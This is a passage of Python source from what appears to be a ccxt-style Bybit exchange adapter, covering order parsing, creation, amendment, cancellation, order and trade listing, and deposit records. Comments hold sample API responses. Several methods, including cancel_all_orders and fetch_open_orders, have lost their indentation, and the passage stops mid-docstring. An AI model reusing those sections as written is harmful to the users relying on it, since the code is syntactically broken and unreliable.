        #     "trigger_price":12400,
        #     "stop_order_id":"3f3b54b1-3379-42c7-8510-44f4d9915be0"
        # }
        #
        marketId = self.safe_string(order, 'symbol')
        market = self.safe_market(marketId, market)
        symbol = market['symbol']
        feeCurrency = None
        timestamp = self.parse8601(self.safe_string(order, 'created_at'))
        # conditional orders carry a stop_order_id instead of an order_id
        id = self.safe_string_2(order, 'order_id', 'stop_order_id')
        type = self.safe_string_lower(order, 'order_type')
        price = self.safe_string(order, 'price')
        average = self.safe_string(order, 'average_price')
        amount = self.safe_string(order, 'qty')
        cost = self.safe_string(order, 'cum_exec_value')
        filled = self.safe_string(order, 'cum_exec_qty')
        remaining = self.safe_string(order, 'leaves_qty')
        marketTypes = self.safe_value(self.options, 'marketTypes', {})
        marketType = self.safe_string(marketTypes, symbol)
        # fees are charged in the quote currency on linear contracts and in
        # the base currency on other contract types
        if market is not None:
            if marketType == 'linear':
                feeCurrency = market['quote']
            else:
                feeCurrency = market['base']
        lastTradeTimestamp = self.safe_timestamp(order, 'last_exec_time')
        # a zero last_exec_time means "never executed", not the epoch
        if lastTradeTimestamp == 0:
            lastTradeTimestamp = None
        status = self.parse_order_status(self.safe_string_2(order, 'order_status', 'stop_order_status'))
        side = self.safe_string_lower(order, 'side')
        feeCostString = self.safe_string(order, 'cum_exec_fee')
        # the fee may come back negative(rebate); report its magnitude
        feeCost = self.parse_number(Precise.string_abs(feeCostString))
        fee = None
        if feeCost is not None:
            fee = {
                'cost': feeCost,
                'currency': feeCurrency,
            }
        clientOrderId = self.safe_string(order, 'order_link_id')
        # the exchange sends an empty string when no client id was supplied
        if (clientOrderId is not None) and (len(clientOrderId) < 1):
            clientOrderId = None
        timeInForce = self.parse_time_in_force(self.safe_string(order, 'time_in_force'))
        stopPrice = self.safe_number_2(order, 'trigger_price', 'stop_px')
        postOnly = (timeInForce == 'PO')
        return self.safe_order2({
            'info': order,
            'id': id,
            'clientOrderId': clientOrderId,
            'timestamp': timestamp,
            'datetime': self.iso8601(timestamp),
            'lastTradeTimestamp': lastTradeTimestamp,
            'symbol': symbol,
            'type': type,
            'timeInForce': timeInForce,
            'postOnly': postOnly,
            'side': side,
            'price': price,
            'stopPrice': stopPrice,
            'amount': amount,
            'cost': cost,
            'average': average,
            'filled': filled,
            'remaining': remaining,
            'status': status,
            'fee': fee,
            'trades': None,
        }, market)
    def fetch_order(self, id, symbol=None, params={}):
        """
        Fetch a single order by id.

        The endpoint is selected twice: first by market type(linear swap /
        inverse swap / futures), then switched to the stop-order variant when
        a 'stop_order_id' is present in params.

        :param str id: the order id(or pass 'stop_order_id'/'order_link_id' via params)
        :param str symbol: unified market symbol(required)
        :param dict params: extra parameters passed through to the endpoint
        :returns dict: a unified order structure
        :raises ArgumentsRequired: if symbol is missing
        """
        if symbol is None:
            raise ArgumentsRequired(self.id + ' fetchOrder() requires a symbol argument')
        self.load_markets()
        market = self.market(symbol)
        request = {
            'symbol': market['id'],
            # 'order_link_id': 'string', # one of order_id, stop_order_id or order_link_id is required
            # regular orders ---------------------------------------------
            # 'order_id': id, # one of order_id or order_link_id is required for regular orders
            # conditional orders ---------------------------------------------
            # 'stop_order_id': id, # one of stop_order_id or order_link_id is required for conditional orders
        }
        method = None
        if market['swap']:
            if market['linear']:
                method = 'privateLinearGetOrderSearch'
            elif market['inverse']:
                method = 'v2PrivateGetOrder'
        elif market['futures']:
            method = 'futuresPrivateGetOrder'
        stopOrderId = self.safe_string(params, 'stop_order_id')
        if stopOrderId is None:
            # regular order: use the positional id unless an order_link_id
            # (client order id) was supplied in params instead
            orderLinkId = self.safe_string(params, 'order_link_id')
            if orderLinkId is None:
                request['order_id'] = id
        else:
            # conditional(stop) order: switch to the stop-order endpoints;
            # the stop_order_id stays in params and is sent as-is
            if market['swap']:
                if market['linear']:
                    method = 'privateLinearGetStopOrderSearch'
                elif market['inverse']:
                    method = 'v2PrivateGetStopOrder'
            elif market['futures']:
                method = 'futuresPrivateGetStopOrder'
        response = getattr(self, method)(self.extend(request, params))
        #
        # {
        #     "ret_code": 0,
        #     "ret_msg": "OK",
        #     "ext_code": "",
        #     "ext_info": "",
        #     "result": {
        #         "user_id": 1,
        #         "symbol": "BTCUSD",
        #         "side": "Sell",
        #         "order_type": "Limit",
        #         "price": "8083",
        #         "qty": 10,
        #         "time_in_force": "GoodTillCancel",
        #         "order_status": "New",
        #         "ext_fields": {"o_req_num": -308787, "xreq_type": "x_create", "xreq_offset": 4154640},
        #         "leaves_qty": 10,
        #         "leaves_value": "0.00123716",
        #         "cum_exec_qty": 0,
        #         "reject_reason": "",
        #         "order_link_id": "",
        #         "created_at": "2019-10-21T07:28:19.396246Z",
        #         "updated_at": "2019-10-21T07:28:19.396246Z",
        #         "order_id": "efa44157-c355-4a98-b6d6-1d846a936b93"
        #     },
        #     "time_now": "1571651135.291930",
        #     "rate_limit_status": 99, # The remaining number of accesses in one minute
        #     "rate_limit_reset_ms": 1580885703683,
        #     "rate_limit": 100
        # }
        #
        # conditional orders
        #
        # {
        #     "ret_code": 0,
        #     "ret_msg": "OK",
        #     "ext_code": "",
        #     "ext_info": "",
        #     "result": {
        #         "user_id": 1,
        #         "symbol": "BTCUSD",
        #         "side": "Buy",
        #         "order_type": "Limit",
        #         "price": "8000",
        #         "qty": 1,
        #         "time_in_force": "GoodTillCancel",
        #         "order_status": "Untriggered",
        #         "ext_fields": {},
        #         "leaves_qty": 1,
        #         "leaves_value": "0.00013333",
        #         "cum_exec_qty": 0,
        #         "cum_exec_value": null,
        #         "cum_exec_fee": null,
        #         "reject_reason": "",
        #         "order_link_id": "",
        #         "created_at": "2019-12-27T19:56:24.052194Z",
        #         "updated_at": "2019-12-27T19:56:24.052194Z",
        #         "order_id": "378a1bbc-a93a-4e75-87f4-502ea754ba36"
        #     },
        #     "time_now": "1577476584.386958",
        #     "rate_limit_status": 99,
        #     "rate_limit_reset_ms": 1580885703683,
        #     "rate_limit": 100
        # }
        #
        result = self.safe_value(response, 'result')
        return self.parse_order(result, market)
    def create_order(self, symbol, type, side, amount, price=None, params={}):
        """
        Create a regular or conditional(stop) order.

        Passing 'stop_px'(or 'stopPrice') together with 'base_price' in params
        routes the request to the stop-order endpoints; both must be present.

        :param str symbol: unified market symbol
        :param str type: 'limit' or 'market'
        :param str side: 'buy' or 'sell'
        :param float amount: order size(contracts; integer for inverse markets)
        :param float price: required for limit orders
        :param dict params: extra parameters(order_link_id/clientOrderId,
            stop_px/stopPrice + base_price, trigger_by, etc.)
        :returns dict: a unified order structure
        :raises ArgumentsRequired: for a limit order without a price, or a
            conditional order with only one of stop_px / base_price
        """
        self.load_markets()
        market = self.market(symbol)
        qty = self.amount_to_precision(symbol, amount)
        # inverse contracts take an integer contract count, linear a float
        if market['inverse']:
            qty = int(qty)
        else:
            qty = float(qty)
        request = {
            # orders ---------------------------------------------------------
            'side': self.capitalize(side),
            'symbol': market['id'],
            'order_type': self.capitalize(type),
            'qty': qty, # order quantity in USD, integer only
            # 'price': float(self.price_to_precision(symbol, price)), # required for limit orders
            'time_in_force': 'GoodTillCancel', # ImmediateOrCancel, FillOrKill, PostOnly
            # 'take_profit': 123.45, # take profit price, only take effect upon opening the position
            # 'stop_loss': 123.45, # stop loss price, only take effect upon opening the position
            # 'reduce_only': False, # reduce only, required for linear orders
            # when creating a closing order, bybit recommends a True value for
            # close_on_trigger to avoid failing due to insufficient available margin
            # 'close_on_trigger': False, required for linear orders
            # 'order_link_id': 'string', # unique client order id, max 36 characters
            # conditional orders ---------------------------------------------
            # base_price is used to compare with the value of stop_px, to decide
            # whether your conditional order will be triggered by crossing trigger
            # price from upper side or lower side, mainly used to identify the
            # expected direction of the current conditional order
            # 'base_price': 123.45, # required for conditional orders
            # 'stop_px': 123.45, # trigger price, required for conditional orders
            # 'trigger_by': 'LastPrice', # IndexPrice, MarkPrice
        }
        priceIsRequired = False
        if type == 'limit':
            priceIsRequired = True
        if priceIsRequired:
            if price is not None:
                request['price'] = float(self.price_to_precision(symbol, price))
            else:
                raise ArgumentsRequired(self.id + ' createOrder() requires a price argument for a ' + type + ' order')
        clientOrderId = self.safe_string_2(params, 'order_link_id', 'clientOrderId')
        if clientOrderId is not None:
            request['order_link_id'] = clientOrderId
            params = self.omit(params, ['order_link_id', 'clientOrderId'])
        stopPx = self.safe_value_2(params, 'stop_px', 'stopPrice')
        basePrice = self.safe_value(params, 'base_price')
        method = None
        # pick the creation endpoint by market type; linear orders must also
        # carry explicit reduce_only / close_on_trigger flags
        if market['swap']:
            if market['linear']:
                method = 'privateLinearPostOrderCreate'
                request['reduce_only'] = False
                request['close_on_trigger'] = False
            elif market['inverse']:
                method = 'v2PrivatePostOrderCreate'
        elif market['futures']:
            method = 'futuresPrivatePostOrderCreate'
        if stopPx is not None:
            # conditional order: requires both trigger(stop_px) and reference
            # (base_price) prices, and switches to the stop-order endpoints
            if basePrice is None:
                raise ArgumentsRequired(self.id + ' createOrder() requires both the stop_px and base_price params for a conditional ' + type + ' order')
            else:
                if market['swap']:
                    if market['linear']:
                        method = 'privateLinearPostStopOrderCreate'
                    elif market['inverse']:
                        method = 'v2PrivatePostStopOrderCreate'
                elif market['futures']:
                    method = 'futuresPrivatePostStopOrderCreate'
                request['stop_px'] = float(self.price_to_precision(symbol, stopPx))
                request['base_price'] = float(self.price_to_precision(symbol, basePrice))
                params = self.omit(params, ['stop_px', 'stopPrice', 'base_price'])
        elif basePrice is not None:
            raise ArgumentsRequired(self.id + ' createOrder() requires both the stop_px and base_price params for a conditional ' + type + ' order')
        response = getattr(self, method)(self.extend(request, params))
        #
        # {
        #     "ret_code": 0,
        #     "ret_msg": "OK",
        #     "ext_code": "",
        #     "ext_info": "",
        #     "result": {
        #         "user_id": 1,
        #         "order_id": "335fd977-e5a5-4781-b6d0-c772d5bfb95b",
        #         "symbol": "BTCUSD",
        #         "side": "Buy",
        #         "order_type": "Limit",
        #         "price": 8800,
        #         "qty": 1,
        #         "time_in_force": "GoodTillCancel",
        #         "order_status": "Created",
        #         "last_exec_time": 0,
        #         "last_exec_price": 0,
        #         "leaves_qty": 1,
        #         "cum_exec_qty": 0,
        #         "cum_exec_value": 0,
        #         "cum_exec_fee": 0,
        #         "reject_reason": "",
        #         "order_link_id": "",
        #         "created_at": "2019-11-30T11:03:43.452Z",
        #         "updated_at": "2019-11-30T11:03:43.455Z"
        #     },
        #     "time_now": "1575111823.458705",
        #     "rate_limit_status": 98,
        #     "rate_limit_reset_ms": 1580885703683,
        #     "rate_limit": 100
        # }
        #
        # conditional orders
        #
        # {
        #     "ret_code": 0,
        #     "ret_msg": "ok",
        #     "ext_code": "",
        #     "result": {
        #         "user_id": 1,
        #         "symbol": "BTCUSD",
        #         "side": "Buy",
        #         "order_type": "Limit",
        #         "price": 8000,
        #         "qty": 1,
        #         "time_in_force": "GoodTillCancel",
        #         "stop_order_type": "Stop",
        #         "trigger_by": "LastPrice",
        #         "base_price": 7000,
        #         "order_status": "Untriggered",
        #         "ext_fields": {
        #             "stop_order_type": "Stop",
        #             "trigger_by": "LastPrice",
        #             "base_price": 7000,
        #             "expected_direction": "Rising",
        #             "trigger_price": 7500,
        #             "op_from": "api",
        #             "remark": "127.0.01",
        #             "o_req_num": 0
        #         },
        #         "leaves_qty": 1,
        #         "leaves_value": 0.00013333,
        #         "reject_reason": null,
        #         "cross_seq": -1,
        #         "created_at": "2019-12-27T12:48:24.000Z",
        #         "updated_at": "2019-12-27T12:48:24.000Z",
        #         "stop_px": 7500,
        #         "stop_order_id": "a85cd1c0-a9a4-49d3-a1bd-bab5ebe946d5"
        #     },
        #     "ext_info": null,
        #     "time_now": "1577450904.327654",
        #     "rate_limit_status": 99,
        #     "rate_limit_reset_ms": 1577450904335,
        #     "rate_limit": "100"
        # }
        #
        result = self.safe_value(response, 'result')
        return self.parse_order(result, market)
    def edit_order(self, id, symbol, type, side, amount=None, price=None, params={}):
        """Amend an existing order's price and/or quantity in place.

        :param str id: the order id to amend(ignored when params['stop_order_id']
            is given, in which case the conditional-order endpoint is used)
        :param str symbol: unified market symbol(required)
        :param str type: unused by this exchange's amend endpoints
        :param str side: unused by this exchange's amend endpoints
        :param float amount: new order quantity(optional)
        :param float price: new order price(optional)
        :param dict params: extra exchange-specific parameters
        :raises ArgumentsRequired: when symbol is None
        :returns dict: {'info', 'id', 'order_id', 'stop_order_id'}
        """
        if symbol is None:
            raise ArgumentsRequired(self.id + ' editOrder() requires an symbol argument')
        self.load_markets()
        market = self.market(symbol)
        request = {
            # 'order_id': id, # only for non-conditional orders
            'symbol': market['id'],
            # 'p_r_qty': self.amount_to_precision(symbol, amount), # new order quantity, optional
            # 'p_r_price' self.priceToprecision(symbol, price), # new order price, optional
            # ----------------------------------------------------------------
            # conditional orders
            # 'stop_order_id': id, # only for conditional orders
            # 'p_r_trigger_price': 123.45, # new trigger price also known as stop_px
        }
        # select the regular amend endpoint by contract flavor first ...
        method = None
        if market['swap']:
            if market['linear']:
                method = 'privateLinearPostOrderReplace'
            elif market['inverse']:
                method = 'v2PrivatePostOrderReplace'
        elif market['futures']:
            method = 'futuresPrivatePostOrderReplace'
        # ... then switch to the conditional(stop) amend endpoint when requested
        stopOrderId = self.safe_string(params, 'stop_order_id')
        if stopOrderId is not None:
            if market['swap']:
                if market['linear']:
                    method = 'privateLinearPostStopOrderReplace'
                elif market['inverse']:
                    method = 'v2PrivatePostStopOrderReplace'
            elif market['futures']:
                method = 'futuresPrivatePostStopOrderReplace'
            request['stop_order_id'] = stopOrderId
            params = self.omit(params, ['stop_order_id'])
        else:
            request['order_id'] = id
        if amount is not None:
            qty = self.amount_to_precision(symbol, amount)
            # inverse contracts quote quantity in whole contracts(int),
            # linear contracts accept fractional amounts(float)
            if market['inverse']:
                qty = int(qty)
            else:
                qty = float(qty)
            request['p_r_qty'] = qty
        if price is not None:
            request['p_r_price'] = float(self.price_to_precision(symbol, price))
        response = getattr(self, method)(self.extend(request, params))
        #
        #     {
        #         "ret_code": 0,
        #         "ret_msg": "ok",
        #         "ext_code": "",
        #         "result": {"order_id": "efa44157-c355-4a98-b6d6-1d846a936b93"},
        #         "time_now": "1539778407.210858",
        #         "rate_limit_status": 99, # remaining number of accesses in one minute
        #         "rate_limit_reset_ms": 1580885703683,
        #         "rate_limit": 100
        #     }
        #
        # conditional orders
        #
        #     {
        #         "ret_code": 0,
        #         "ret_msg": "ok",
        #         "ext_code": "",
        #         "result": {"stop_order_id": "378a1bbc-a93a-4e75-87f4-502ea754ba36"},
        #         "ext_info": null,
        #         "time_now": "1577475760.604942",
        #         "rate_limit_status": 96,
        #         "rate_limit_reset_ms": 1577475760612,
        #         "rate_limit": "100"
        #     }
        #
        result = self.safe_value(response, 'result', {})
        # exactly one of order_id / stop_order_id is present depending on the branch
        return {
            'info': response,
            'id': self.safe_string_2(result, 'order_id', 'stop_order_id'),
            'order_id': self.safe_string(result, 'order_id'),
            'stop_order_id': self.safe_string(result, 'stop_order_id'),
        }
    def cancel_order(self, id, symbol=None, params={}):
        """Cancel a single open order.

        :param str id: the order id(used when neither params['stop_order_id']
            nor params['order_link_id'] is given)
        :param str symbol: unified market symbol(required)
        :param dict params: may carry 'stop_order_id' to cancel a conditional
            order, or 'order_link_id' to cancel by client order id
        :raises ArgumentsRequired: when symbol is None
        :returns dict: a unified order structure
        """
        if symbol is None:
            raise ArgumentsRequired(self.id + ' cancelOrder() requires a symbol argument')
        self.load_markets()
        market = self.market(symbol)
        request = {
            'symbol': market['id'],
            # 'order_link_id': 'string', # one of order_id, stop_order_id or order_link_id is required
            # regular orders ---------------------------------------------
            # 'order_id': id, # one of order_id or order_link_id is required for regular orders
            # conditional orders ---------------------------------------------
            # 'stop_order_id': id, # one of stop_order_id or order_link_id is required for conditional orders
        }
        method = None
        if market['swap']:
            if market['linear']:
                method = 'privateLinearPostOrderCancel'
            elif market['inverse']:
                method = 'v2PrivatePostOrderCancel'
        elif market['futures']:
            method = 'futuresPrivatePostOrderCancel'
        stopOrderId = self.safe_string(params, 'stop_order_id')
        if stopOrderId is None:
            # regular order: identify it by order_id unless the caller
            # supplied a client order id(order_link_id) in params
            orderLinkId = self.safe_string(params, 'order_link_id')
            if orderLinkId is None:
                request['order_id'] = id
        else:
            # conditional order: switch endpoints; stop_order_id stays in
            # params and reaches the request via self.extend() below
            if market['swap']:
                if market['linear']:
                    method = 'privateLinearPostStopOrderCancel'
                elif market['inverse']:
                    method = 'v2PrivatePostStopOrderCancel'
            elif market['futures']:
                method = 'futuresPrivatePostStopOrderCancel'
        response = getattr(self, method)(self.extend(request, params))
        result = self.safe_value(response, 'result', {})
        return self.parse_order(result, market)
def cancel_all_orders(self, symbol=None, params={}):
if symbol is None:
raise ArgumentsRequired(self.id + ' cancelAllOrders() requires a symbol argument')
self.load_markets()
market = self.market(symbol)
request = {
'symbol': market['id'],
}
options = self.safe_value(self.options, 'cancelAllOrders', {})
defaultMethod = None
if market['swap']:
if market['linear']:
defaultMethod = 'privateLinearPostOrderCancelAll'
elif market['inverse']:
defaultMethod = 'v2PrivatePostOrderCancelAll'
elif market['futures']:
defaultMethod = 'futuresPrivatePostOrderCancelAll'
method = self.safe_string(options, 'method', defaultMethod)
response = getattr(self, method)(self.extend(request, params))
result = self.safe_value(response, 'result', [])
return self.parse_orders(result, market)
    def fetch_orders(self, symbol=None, since=None, limit=None, params={}):
        """Fetch orders - regular orders by default, conditional(stop) orders
        when 'stop_order_id' or 'stop_order_status' is present in params.

        :param str symbol: unified market symbol; when omitted the endpoint is
            chosen from options['marketTypes'] / options['defaultType']
        :param int since: not sent to the exchange, only used when parsing
        :param int limit: max number of orders(exchange default 20, max 50)
        :param dict params: extra parameters; 'stop_order_status' may be a
            string or a list of strings
        :returns list: unified order structures
        """
        self.load_markets()
        request = {
            # 'order_id': 'string'
            # 'order_link_id': 'string', # unique client order id, max 36 characters
            # 'symbol': market['id'], # default BTCUSD
            # 'order': 'desc', # asc
            # 'page': 1,
            # 'limit': 20, # max 50
            # 'order_status': 'Created,New'
            # conditional orders ---------------------------------------------
            # 'stop_order_id': 'string',
            # 'stop_order_status': 'Untriggered',
        }
        market = None
        if symbol is not None:
            market = self.market(symbol)
            request['symbol'] = market['id']
        if limit is not None:
            request['limit'] = limit
        options = self.safe_value(self.options, 'fetchOrders', {})
        defaultType = self.safe_string(self.options, 'defaultType', 'linear')
        marketTypes = self.safe_value(self.options, 'marketTypes', {})
        marketType = self.safe_string(marketTypes, symbol, defaultType)
        defaultMethod = None
        # fall back to the configured market type when no symbol was given
        marketDefined = (market is not None)
        linear = (marketDefined and market['linear']) or (marketType == 'linear')
        inverse = (marketDefined and market['swap'] and market['inverse']) or (marketType == 'inverse')
        futures = (marketDefined and market['futures']) or (marketType == 'futures')
        if linear:
            defaultMethod = 'privateLinearGetOrderList'
        elif inverse:
            defaultMethod = 'v2PrivateGetOrderList'
        elif futures:
            defaultMethod = 'futuresPrivateGetOrderList'
        query = params
        # conditional(stop) orders live on a separate set of endpoints
        if ('stop_order_id' in params) or ('stop_order_status' in params):
            stopOrderStatus = self.safe_value(params, 'stop_order_status')
            if stopOrderStatus is not None:
                if isinstance(stopOrderStatus, list):
                    stopOrderStatus = ','.join(stopOrderStatus)
                request['stop_order_status'] = stopOrderStatus
                query = self.omit(params, 'stop_order_status')
            if linear:
                defaultMethod = 'privateLinearGetStopOrderList'
            elif inverse:
                defaultMethod = 'v2PrivateGetStopOrderList'
            elif futures:
                defaultMethod = 'futuresPrivateGetStopOrderList'
        method = self.safe_string(options, 'method', defaultMethod)
        response = getattr(self, method)(self.extend(request, query))
        #
        #     {
        #         "ret_code": 0,
        #         "ret_msg": "ok",
        #         "ext_code": "",
        #         "result": {
        #             "current_page": 1,
        #             "last_page": 6,
        #             "data": [
        #                 {
        #                     "user_id": 1,
        #                     "symbol": "BTCUSD",
        #                     "side": "Sell",
        #                     "order_type": "Market",
        #                     "price": 7074,
        #                     "qty": 2,
        #                     "time_in_force": "ImmediateOrCancel",
        #                     "order_status": "Filled",
        #                     "ext_fields": {
        #                         "close_on_trigger": True,
        #                         "orig_order_type": "BLimit",
        #                         "prior_x_req_price": 5898.5,
        #                         "op_from": "pc",
        #                         "remark": "127.0.0.1",
        #                         "o_req_num": -34799032763,
        #                         "xreq_type": "x_create"
        #                     },
        #                     "last_exec_time": "1577448481.696421",
        #                     "last_exec_price": 7070.5,
        #                     "leaves_qty": 0,
        #                     "leaves_value": 0,
        #                     "cum_exec_qty": 2,
        #                     "cum_exec_value": 0.00028283,
        #                     "cum_exec_fee": 0.00002,
        #                     "reject_reason": "NoError",
        #                     "order_link_id": "",
        #                     "created_at": "2019-12-27T12:08:01.000Z",
        #                     "updated_at": "2019-12-27T12:08:01.000Z",
        #                     "order_id": "f185806b-b801-40ff-adec-52289370ed62"
        #                 }
        #             ]
        #         },
        #         "ext_info": null,
        #         "time_now": "1577448922.437871",
        #         "rate_limit_status": 98,
        #         "rate_limit_reset_ms": 1580885703683,
        #         "rate_limit": 100
        #     }
        #
        # conditional orders
        #
        #     {
        #         "ret_code": 0,
        #         "ret_msg": "ok",
        #         "ext_code": "",
        #         "result": {
        #             "current_page": 1,
        #             "last_page": 1,
        #             "data": [
        #                 {
        #                     "user_id": 1,
        #                     "stop_order_status": "Untriggered",
        #                     "symbol": "BTCUSD",
        #                     "side": "Buy",
        #                     "order_type": "Limit",
        #                     "price": 8000,
        #                     "qty": 1,
        #                     "time_in_force": "GoodTillCancel",
        #                     "stop_order_type": "Stop",
        #                     "trigger_by": "LastPrice",
        #                     "base_price": 7000,
        #                     "order_link_id": "",
        #                     "created_at": "2019-12-27T12:48:24.000Z",
        #                     "updated_at": "2019-12-27T12:48:24.000Z",
        #                     "stop_px": 7500,
        #                     "stop_order_id": "a85cd1c0-a9a4-49d3-a1bd-bab5ebe946d5"
        #                 },
        #             ]
        #         },
        #         "ext_info": null,
        #         "time_now": "1577451658.755468",
        #         "rate_limit_status": 599,
        #         "rate_limit_reset_ms": 1577451658762,
        #         "rate_limit": 600
        #     }
        #
        result = self.safe_value(response, 'result', {})
        data = self.safe_value(result, 'data', [])
        return self.parse_orders(data, market, since, limit)
def fetch_closed_orders(self, symbol=None, since=None, limit=None, params={}):
defaultStatuses = [
'Rejected',
'Filled',
'Cancelled',
# conditional orders
# 'Active',
# 'Triggered',
# 'Cancelled',
# 'Rejected',
# 'Deactivated',
]
options = self.safe_value(self.options, 'fetchClosedOrders', {})
status = self.safe_value(options, 'order_status', defaultStatuses)
if isinstance(status, list):
status = ','.join(status)
request = {}
stopOrderStatus = self.safe_value(params, 'stop_order_status')
if stopOrderStatus is None:
request['order_status'] = status
else:
request['stop_order_status'] = stopOrderStatus
return self.fetch_orders(symbol, since, limit, self.extend(request, params))
def fetch_open_orders(self, symbol=None, since=None, limit=None, params={}):
defaultStatuses = [
'Created',
'New',
'PartiallyFilled',
'PendingCancel',
# conditional orders
# 'Untriggered',
]
options = self.safe_value(self.options, 'fetchOpenOrders', {})
status = self.safe_value(options, 'order_status', defaultStatuses)
if isinstance(status, list):
status = ','.join(status)
request = {}
stopOrderStatus = self.safe_value(params, 'stop_order_status')
if stopOrderStatus is None:
request['order_status'] = status
else:
request['stop_order_status'] = stopOrderStatus
return self.fetch_orders(symbol, since, limit, self.extend(request, params))
def fetch_order_trades(self, id, symbol=None, since=None, limit=None, params={}):
request = {
'order_id': id,
}
return self.fetch_my_trades(symbol, since, limit, self.extend(request, params))
    def fetch_my_trades(self, symbol=None, since=None, limit=None, params={}):
        """Fetch the current account's trade executions.

        Either a symbol or params['order_id'] must be supplied.

        :param str symbol: unified market symbol
        :param int since: start time in milliseconds(sent as 'start_time')
        :param int limit: max number of trades(exchange default 20, max 50)
        :param dict params: may carry 'order_id' to fetch fills of one order
        :raises ArgumentsRequired: when both symbol and params['order_id'] are missing
        :returns list: unified trade structures
        """
        self.load_markets()
        request = {
            # 'order_id': 'f185806b-b801-40ff-adec-52289370ed62', # if not provided will return user's trading records
            # 'symbol': market['id'],
            # 'start_time': int(since / 1000),
            # 'page': 1,
            # 'limit' 20, # max 50
        }
        market = None
        if symbol is None:
            orderId = self.safe_string(params, 'order_id')
            if orderId is None:
                raise ArgumentsRequired(self.id + ' fetchMyTrades() requires a symbol argument or an order_id param')
            else:
                request['order_id'] = orderId
                params = self.omit(params, 'order_id')
        else:
            market = self.market(symbol)
            request['symbol'] = market['id']
        if since is not None:
            request['start_time'] = since
        if limit is not None:
            request['limit'] = limit # default 20, max 50
        # pick the endpoint by market type(or the configured default when
        # only an order_id was supplied)
        defaultType = self.safe_string(self.options, 'defaultType', 'linear')
        marketTypes = self.safe_value(self.options, 'marketTypes', {})
        marketType = self.safe_string(marketTypes, symbol, defaultType)
        marketDefined = (market is not None)
        linear = (marketDefined and market['linear']) or (marketType == 'linear')
        inverse = (marketDefined and market['swap'] and market['inverse']) or (marketType == 'inverse')
        futures = (marketDefined and market['futures']) or (marketType == 'futures')
        method = None
        if linear:
            method = 'privateLinearGetTradeExecutionList'
        elif inverse:
            method = 'v2PrivateGetExecutionList'
        elif futures:
            method = 'futuresPrivateGetExecutionList'
        response = getattr(self, method)(self.extend(request, params))
        #
        # inverse
        #
        #     {
        #         "ret_code": 0,
        #         "ret_msg": "OK",
        #         "ext_code": "",
        #         "ext_info": "",
        #         "result": {
        #             "order_id": "Abandonednot !", # Abandonednot !
        #             "trade_list": [
        #                 {
        #                     "closed_size": 0,
        #                     "cross_seq": 277136382,
        #                     "exec_fee": "0.0000001",
        #                     "exec_id": "256e5ef8-abfe-5772-971b-f944e15e0d68",
        #                     "exec_price": "8178.5",
        #                     "exec_qty": 1,
        #                     "exec_time": "1571676941.70682",
        #                     "exec_type": "Trade", #Exec Type Enum
        #                     "exec_value": "0.00012227",
        #                     "fee_rate": "0.00075",
        #                     "last_liquidity_ind": "RemovedLiquidity", #Liquidity Enum
        #                     "leaves_qty": 0,
        #                     "nth_fill": 2,
        #                     "order_id": "7ad50cb1-9ad0-4f74-804b-d82a516e1029",
        #                     "order_link_id": "",
        #                     "order_price": "8178",
        #                     "order_qty": 1,
        #                     "order_type": "Market", #Order Type Enum
        #                     "side": "Buy", #Side Enum
        #                     "symbol": "BTCUSD", #Symbol Enum
        #                     "user_id": 1
        #                 }
        #             ]
        #         },
        #         "time_now": "1577483699.281488",
        #         "rate_limit_status": 118,
        #         "rate_limit_reset_ms": 1577483699244737,
        #         "rate_limit": 120
        #     }
        #
        # linear
        #
        #     {
        #         "ret_code":0,
        #         "ret_msg":"OK",
        #         "ext_code":"",
        #         "ext_info":"",
        #         "result":{
        #             "current_page":1,
        #             "data":[
        #                 {
        #                     "order_id":"b59418ec-14d4-4ef9-b9f4-721d5d576974",
        #                     "order_link_id":"",
        #                     "side":"Sell",
        #                     "symbol":"BTCUSDT",
        #                     "exec_id":"0327284d-faec-5191-bd89-acc5b4fafda9",
        #                     "price":0.5,
        #                     "order_price":0.5,
        #                     "order_qty":0.01,
        #                     "order_type":"Market",
        #                     "fee_rate":0.00075,
        #                     "exec_price":9709.5,
        #                     "exec_type":"Trade",
        #                     "exec_qty":0.01,
        #                     "exec_fee":0.07282125,
        #                     "exec_value":97.095,
        #                     "leaves_qty":0,
        #                     "closed_size":0.01,
        #                     "last_liquidity_ind":"RemovedLiquidity",
        #                     "trade_time":1591648052,
        #                     "trade_time_ms":1591648052861
        #                 }
        #             ]
        #         },
        #         "time_now":"1591736501.979264",
        #         "rate_limit_status":119,
        #         "rate_limit_reset_ms":1591736501974,
        #         "rate_limit":120
        #     }
        #
        result = self.safe_value(response, 'result', {})
        # inverse responses nest the fills under 'trade_list', linear under 'data'
        trades = self.safe_value_2(result, 'trade_list', 'data', [])
        return self.parse_trades(trades, market, since, limit)
    def fetch_deposits(self, code=None, since=None, limit=None, params={}):
        """Fetch deposit records from the wallet fund-records endpoint,
        filtered with wallet_fund_type=Deposit.

        :param str code: unified currency code(optional)
        :param int since: start date in milliseconds(sent as yyyy-mm-dd)
        :param int limit: max number of records(exchange default 20, max 50)
        :param dict params: extra exchange-specific parameters
        :returns list: unified transaction structures tagged type='deposit'
        """
        self.load_markets()
        request = {
            # 'coin': currency['id'],
            # 'currency': currency['id'], # alias
            # 'start_date': self.iso8601(since),
            # 'end_date': self.iso8601(till),
            'wallet_fund_type': 'Deposit', # Deposit, Withdraw, RealisedPNL, Commission, Refund, Prize, ExchangeOrderWithdraw, ExchangeOrderDeposit
            # 'page': 1,
            # 'limit': 20, # max 50
        }
        currency = None
        if code is not None:
            currency = self.currency(code)
            request['coin'] = currency['id']
        if since is not None:
            # the endpoint accepts dates, not timestamps
            request['start_date'] = self.yyyymmdd(since)
        if limit is not None:
            request['limit'] = limit
        response = self.v2PrivateGetWalletFundRecords(self.extend(request, params))
        #
        #     {
        #         "ret_code": 0,
        #         "ret_msg": "ok",
        #         "ext_code": "",
        #         "result": {
        #             "data": [
        #                 {
        #                     "id": 234467,
        #                     "user_id": 1,
        #                     "coin": "BTC",
        #                     "wallet_id": 27913,
        #                     "type": "Realized P&L",
        #                     "amount": "-0.00000006",
        #                     "tx_id": "",
        #                     "address": "BTCUSD",
        #                     "wallet_balance": "0.03000330",
        #                     "exec_time": "2019-12-09T00:00:25.000Z",
        #                     "cross_seq": 0
        #                 }
        #             ]
        #         },
        #         "ext_info": null,
        #         "time_now": "1577481867.115552",
        #         "rate_limit_status": 119,
        #         "rate_limit_reset_ms": 1577481867122,
        #         "rate_limit": 120
        #     }
        #
        result = self.safe_value(response, 'result', {})
        data = self.safe_value(result, 'data', [])
        return self.parse_transactions(data, currency, since, limit, {'type': 'deposit'})
    def fetch_withdrawals(self, code=None, since=None, limit=None, params={}):
        """Fetch withdrawal records.

